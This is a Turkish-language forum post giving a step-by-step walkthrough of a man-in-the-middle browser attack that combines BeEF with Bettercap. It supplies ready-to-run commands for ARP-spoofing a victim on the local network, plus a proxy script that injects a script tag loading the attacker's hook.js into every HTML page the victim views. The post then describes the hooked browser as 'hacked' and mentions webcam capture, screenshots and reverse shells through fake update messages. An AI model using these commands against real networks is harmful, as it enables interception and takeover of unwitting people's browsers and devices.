- 2 Ocak 2016
- 447
- 0
Hepinize merhabalar. Uzun zamandır bu forumdayım fakat pek aktif değilim. İçimden geldiği için böyle bir konu açmak istedim. Umarım yararlı olur.
Öncelikle BeEF nedir? BeEF, The Browser Exploitation Framework'in kısaltmasıdır. Web tarayıcısına odaklanan bir penetrasyon test aracıdır. Kalimize kurmak için;
Kod:
sudo apt-get install beef-xss
komutumuzu çalıştırıyoruz ve ardından 300mb gibi bir yükleme yapıyor.
Bu saldırımızı yaparken Bettercap isimli aracımızı da kullanacağız. Onun da nasıl kurulduğunu gösterelim;
Kod:
sudo apt-get install bettercap
Artık ince ayarlarımızı yapmaya geçebiliriz.Öncelikle vermiş olduğum kodları sırasıyla çalıştırıyoruz. İlk kodumuzda bettercap'e ekleyeceğimiz capletin mkdir(make directory) komutu ile klasörünü oluşturuyoruz.
Kod:
mkdir /usr/share/bettercap/caplets/beefcustom
Daha sonra echo ile .cap ayar dosyamızın içine kodlarımızı bastırıyoruz.
Kod:
echo "set arp.spoof.fullduplex true
#change target ip
set arp.spoof.targets <KURBAN LOCAL İP>
set http.proxy.script beefcustom.js
http.proxy on
sleep 1
arp.spoof on" > /usr/share/bettercap/caplets/beefcustom/beefcustom.cap
Ardından tarayıcının girdiği sitelere zararlı javascript kodumuzu enjekte ediyoruz.
Kod:
echo "function onLoad() {
log( "BeefInject loaded." );
}
function onResponse(req, res) {
if( res.ContentType.indexOf('text/html') == 0 ){
var body = res.ReadBody();
if( body.indexOf('</head>') != -1 ) {
log( "BeefInject loaded." );
res.Body = body.replace(
'</head>',
'<script type="text/javascript" src="http://<KENDİ LOCAL IP ADRESİNİZ>:3000/hook.js"></script></head>'
);
}
}
}
" > /usr/share/bettercap/caplets/beefcustom/beefcustom.js
Belirttiğim yerlere gerekli IP adreslerini yazdıysanız artık icraate geçebiliriz. Hemen BeEF imizi şu kod ile çalıştıralım;
Kod:
beef-xss
Bir süre bekledikten sonra önümüze aşağıdaki gibi bir login ekranı gelecek.
Kullanıcı adımız ve şifremiz default "beef" olarak ayarlanmıştır ama girişte değiştirmenizi isterse şifrenize ne koyduysanız onu yazarak girişinizi yapın.
BeEF görsel arayüze sahip, tarayıcı üzerinden çalıştırılan bir frameworktür. Yukarıda gördüğünüz gibi oldukça basit bir görünümü var.
Son olarak bettercap'imizi de açıyoruz ve saldırımızı başlatıyoruz;
Kod:
bettercap -iface wlan0 -caplet /usr/share/bettercap/caplets/beefcustom/beefcustom.cap
Evet arkadaşlar hedef online olduğu an artık BeEF ekranından görüyoruz ve karşı tarafın tarayıcısını hacklemiş bulunuyoruz. HTTP sitelerde çalışır ama hstshijack ile birleştirip kullanırsak https sitelerde de işe yarar. BeEF ile neler yapabileceğiniz size kalmış. Webcam veya ekran görüntüsü alabilirsiniz, sahte güncelleme mesajı ile reverse shell alabilirsiniz ve daha birçok şey yapabilirsiniz. Karşı taraf tarayıcısını kapattığı an offline olarak gözükür ve işlem yapamazsınız. Konumu beğendiyseniz teşekkür butonuna basmayı unutmayın.
Son düzenleme: